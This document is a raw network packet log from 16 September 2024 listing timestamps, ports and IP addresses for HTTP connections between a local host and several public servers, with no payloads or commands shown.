Sep 16, 2024 09:32:24.653296947 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.653331041 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.653362989 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.653368950 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.653397083 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.653443098 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.654231071 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.654263973 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.654298067 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.654309034 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.654330969 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.654370070 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.721338034 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.721391916 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.721426964 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.721443892 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.721476078 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.721510887 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.721514940 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.741333961 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.741384983 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.741384029 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.741417885 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.741451979 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.741456985 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.741485119 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.741518974 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.741523981 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.741795063 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.741827011 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.741837025 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.741859913 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.741892099 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.741903067 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.742342949 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.742376089 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.742415905 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.742424011 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.742456913 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.742470026 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.742489100 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.742521048 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.742527008 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.743235111 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.743283987 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.743304014 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.743336916 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.743367910 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.743381977 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.743417978 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.743453026 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.743493080 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.744247913 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.744292021 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.744296074 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.744329929 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.744359970 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.744375944 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.744393110 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.744425058 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.744436026 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.745074987 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.745121956 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.745125055 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.745157003 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.745188951 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.745193005 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.745220900 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.745254040 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.745255947 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.745981932 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.746027946 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.746033907 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.746082067 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.746113062 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.746121883 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.746145964 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.746186972 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.836532116 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.951863050 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.951891899 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.951904058 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.951914072 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.951925039 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.951922894 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.951936007 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.951946020 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.951958895 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.951968908 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.951980114 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.951992035 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952003002 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952003956 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952003956 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952003956 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952011108 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952043056 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952043056 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952052116 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952064037 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952064037 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952064037 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952075005 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952085018 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952094078 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952095985 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952105999 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952116013 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952126980 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952128887 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952128887 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952137947 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952147961 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952157021 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952157021 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952159882 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952182055 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952183008 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952183008 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952192068 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952203035 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952203989 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952213049 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952224016 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952236891 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952240944 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952250957 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952261925 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952272892 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952274084 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952274084 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952281952 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952292919 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952299118 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952302933 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952313900 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952325106 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.952330112 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952348948 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.952378035 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.955449104 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.955460072 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.955470085 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.955481052 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.955490112 CEST | 55840 | 80 | 192.168.2.4 | 44.213.25.70
Sep 16, 2024 09:32:24.955491066 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
Sep 16, 2024 09:32:24.955506086 CEST | 80 | 55840 | 44.213.25.70 | 192.168.2.4
                                  Sep 16, 2024 09:32:24.955517054 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955517054 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955528021 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955535889 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955538988 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955549002 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955555916 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955560923 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955570936 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955575943 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955580950 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955591917 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955595016 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955602884 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955610991 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955615044 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955651999 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955666065 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:25.855026960 CEST5584180192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:25.860193014 CEST805584144.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:25.861659050 CEST5584180192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:25.868325949 CEST5584180192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:25.873223066 CEST805584144.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:27.014731884 CEST805584144.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:27.034292936 CEST805584144.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:27.034377098 CEST805584144.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:27.038198948 CEST5584180192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:27.038198948 CEST5584180192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:27.043164968 CEST805584144.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:40.143505096 CEST5584280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:40.148439884 CEST80558423.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:40.148535013 CEST5584280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:40.161334038 CEST5584280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:40.166169882 CEST80558423.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:41.543287992 CEST80558423.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:41.543378115 CEST5584280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:41.667515039 CEST5584280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:41.672462940 CEST80558423.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:42.683867931 CEST5584380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:42.689117908 CEST80558433.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:42.689194918 CEST5584380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:42.702240944 CEST5584380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:42.707187891 CEST80558433.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:43.154696941 CEST80558433.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:43.155592918 CEST5584380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:44.211699009 CEST5584380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:44.216808081 CEST80558433.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.231544018 CEST5584480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:45.236901999 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.237023115 CEST5584480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:45.251543999 CEST5584480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:45.257628918 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.257644892 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.257926941 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.257947922 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.257962942 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.257989883 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.258003950 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.258047104 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.258059978 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.697511911 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.697957993 CEST5584480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:46.758351088 CEST5584480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:46.763489008 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:47.787535906 CEST5584580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:47.792490959 CEST80558453.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:47.795589924 CEST5584580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:47.811455011 CEST5584580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:47.816574097 CEST80558453.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:48.271414995 CEST80558453.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:48.271651030 CEST80558453.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:48.271727085 CEST5584580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:48.274542093 CEST5584580192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:48.279443979 CEST80558453.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:53.534113884 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:53.539799929 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:53.540324926 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:53.551100969 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:53.557811022 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009495974 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009573936 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009608984 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009644032 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009650946 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:54.009676933 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009711981 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009744883 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009764910 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:54.009779930 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009813070 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009845972 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009852886 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:54.009944916 CEST805584654.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:54.009960890 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:54.010163069 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:55.055239916 CEST5584680192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.075566053 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.080564022 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.083645105 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.095550060 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.101278067 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.563927889 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.563945055 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.563957930 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.563968897 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.563981056 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.563996077 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.564006090 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.564016104 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.564026117 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.564023018 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.564038038 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.564106941 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.564106941 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.564106941 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:56.564495087 CEST805584754.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:56.564547062 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:57.602276087 CEST5584780192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:58.622309923 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:58.627228022 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.627310991 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:58.642357111 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:58.647207022 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647217035 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647228003 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647237062 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647245884 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647394896 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647403955 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647417068 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:58.647425890 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102894068 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102920055 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102931023 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102947950 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102955103 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:59.102960110 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102971077 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102982998 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.102982998 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:59.102994919 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.103005886 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:59.103007078 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.103019953 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.103028059 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:59.103056908 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:32:59.103074074 CEST805584854.81.206.248192.168.2.4
                                  Sep 16, 2024 09:32:59.103116035 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:00.149005890 CEST5584880192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.169971943 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.175009966 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.175180912 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.185905933 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.190726995 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.650978088 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.650999069 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651010036 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651021957 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651032925 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651045084 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651057959 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651067972 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651079893 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651092052 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.651124954 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.651262045 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.651262045 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.651741982 CEST805584954.81.206.248192.168.2.4
                                  Sep 16, 2024 09:33:01.652061939 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.655770063 CEST5584980192.168.2.454.81.206.248
                                  Sep 16, 2024 09:33:01.660538912 CEST805584954.81.206.248192.168.2.4
